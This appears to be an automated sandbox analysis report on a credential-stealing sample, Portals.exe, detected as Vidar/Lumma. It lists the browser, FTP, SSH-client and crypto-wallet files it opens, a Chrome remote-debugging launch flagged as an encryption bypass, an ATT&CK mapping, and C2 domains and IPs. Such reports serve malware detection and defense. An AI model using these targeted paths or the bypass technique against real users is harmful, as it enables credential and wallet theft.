        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
        Tries to harvest and steal Bitcoin Wallet information
        Source: C:\Users\user\Desktop\Portals.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\Portals.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
        Tries to harvest and steal ftp login credentials
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
        Source: Yara matchFile source: Process Memory Space: Portals.exe PID: 8012, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Attempt to bypass Chrome Application-Bound Encryption
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        Yara detected Vidar stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: Portals.exe PID: 8012, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		2
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Create Account        		1
        Extra Window Memory Injection        		1
        Deobfuscate/Decode Files or Information        		1
        Credentials in Registry        		1
        Account Discovery        		Remote Desktop Protocol4
        Data from Local System        		21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
        Process Injection        		1
        Obfuscated Files or Information        		Security Account Manager4
        File and Directory Discovery        		SMB/Windows Admin Shares1
        Screen Capture        		1
        Remote Access Software        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Software Packing        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets31
        Security Software Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials3
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        File Deletion        		DCSync12
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Extra Window Memory Injection        		Proc Filesystem1
        System Owner/User Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Masquerading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron3
        Virtualization/Sandbox Evasion        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
        Process Injection        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637568 Sample: Portals.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 33 b.b.goldenloafuae.com 2->33 35 t.me 2->35 37 steamcommunity.com 2->37 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 6 other signatures 2->57 9 Portals.exe 2->9         started        signatures3 process4 signatures5 59 Attempt to bypass Chrome Application-Bound Encryption 9->59 61 Self deletion via cmd or bat file 9->61 63 Contains functionality to inject code into remote processes 9->63 65 2 other signatures 9->65 12 Portals.exe 29 9->12         started        16 WerFault.exe 21 16 9->16         started        process6 dnsIp7 45 b.b.goldenloafuae.com 94.130.189.58, 443, 49724, 49727 HETZNER-ASDE Germany 12->45 47 t.me 149.154.167.99, 443, 49720, 49737 TELEGRAMRU United Kingdom 12->47 49 3 other IPs or domains 12->49 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 12->69 71 Self deletion via cmd or bat file 12->71 73 4 other signatures 12->73 19 chrome.exe 12->19         started        22 cmd.exe 1 12->22         started        31 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->31 dropped file8 signatures9 process10 dnsIp11 39 192.168.2.4, 138, 443, 49709 unknown unknown 19->39 24 chrome.exe 19->24         started        27 conhost.exe 22->27         started        29 timeout.exe 1 22->29         started        process12 dnsIp13 41 142.250.186.132, 443, 49769, 49770 GOOGLEUS United States 24->41 43 www.google.com 24->43

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Portals.exe69%VirustotalBrowse
        Portals.exe87%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
        Portals.exe100%AviraTR/AD.Nekark.zctli

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://s.ytimg.com;0%Avira URL Cloudsafe
        http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
        https://b.b.goldenloafuae.comKJ0%Avira URL Cloudsafe
        https://broadcast.st.dl.eccdnx.com0%Avira URL Cloudsafe
        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
        https://b.b.goldenloafuae.com/HS100%Avira URL Cloudmalware
        https://lv.queniujq.cn0%Avira URL Cloudsafe
        http://unisolated.invalid/0%Avira URL Cloudsafe
        https://116.202.4.223100%Avira URL Cloudmalware
        https://b.b.goldenloafuae.com100%Avira URL Cloudmalware
        https://b.b.goldenloafuae.com/OzGS%100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        b.b.goldenloafuae.com
        		94.130.189.58
        		truetrue
          		unknown
          steamcommunity.com
          		23.197.127.21
          		truefalse
            		high
            t.me
            		149.154.167.99
            		truefalse
              		high
              www.google.com
              		142.250.184.196
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://t.me/l793oyfalse
                  		high
                  https://steamcommunity.com/profiles/76561199829660832false
                    		high
                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/ac/?q=iekxl6.1.drfalse
                          		high
                          https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000D.00000002.1919444558.0000322C003E0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                              		high
                              https://support.google.com/chrome/answer/6098869chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                		high
                                https://mail.google.com/chat/download?usp=chrome_defaultfaultchrome.exe, 0000000D.00000002.1931542965.0000322C017C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.google.com/document/Jchrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drfalse
                                          		high
                                          https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 0000000D.00000002.1921596827.0000322C0093C000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.gstatic.cn/recaptcha/Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.google.com/chrome?p=desktop_tab_groupschrome.exe, 0000000D.00000002.1920543191.0000322C006A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://dns-tunnel-check.googlezip.net/connectchrome.exe, 0000000D.00000003.1841148367.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925308799.0000322C01072000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/document/:chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.valvesoftware.com/legal.htmPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.youtube.comPortals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://mail.google.com/chat/chrome.exe, 0000000D.00000002.1925829622.0000322C010B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1841148367.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920607852.0000322C00720000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925308799.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1924180759.0000322C00F3C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://unisolated.invalid/chrome.exe, 0000000D.00000002.1923013923.0000322C00DA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlchrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                          		high
                                                          https://www.google.com/chrome/tips/chrome.exe, 0000000D.00000002.1922902219.0000322C00D44000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922329784.0000322C00B3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1921347824.0000322C008D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                              		high
                                                              https://drive.google.com/?lfhs=2chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&amPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                  		high
                                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                        		high
                                                                        https://s.ytimg.com;Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                          		high
                                                                          https://www.youtube.com/?feature=ytcachrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drfalse
                                                                              		high
                                                                              https://b.b.goldenloafuae.com/OzGS%Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://www.google.com/chrome/browser-tools/chrome.exe, 0000000D.00000002.1921653281.0000322C00978000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com/tools/feedback/chrome/__submit7Echrome.exe, 0000000D.00000002.1920186646.0000322C005E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                      		high
                                                                                      https://steamcommunity.com/okPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://chrome.google.com/webstorechrome.exe, 0000000D.00000003.1872766329.0000322C01604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://steamcommunity.com/profiles/76561199829660832/badges/48Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=iekxl6.1.drfalse
                                                                                                		high
                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaPortals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drfalse
                                                                                                  		high
                                                                                                  https://lv.queniujq.cnPortals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.youtube.com/Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                      		high
                                                                                                      https://b.b.goldenloafuae.com/HSPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
